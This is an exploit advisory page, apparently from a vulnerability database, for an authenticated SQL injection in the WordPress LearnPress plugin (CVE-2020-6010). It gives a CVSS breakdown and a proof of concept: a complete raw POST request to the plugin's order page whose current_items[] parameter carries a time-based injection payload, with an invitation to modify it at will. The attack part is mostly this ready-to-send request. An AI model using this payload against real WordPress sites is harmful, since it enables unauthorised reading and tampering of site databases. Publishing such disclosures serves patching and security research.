WordPress LearnPress SQL Injection

2021.07.21
Credit: nhattruong
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 - SQL Injection (Authenticated) # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < 3.2.6.8 # References link: https://wpscan.com/vulnerability/10208 # CVE: CVE-2020-6010 POC: 1. Go to url http://<host>/wp-admin 2. Login with a cred 3. Execute the payload POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/plain, */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 128 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- - # Modify current_items[] as you want


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top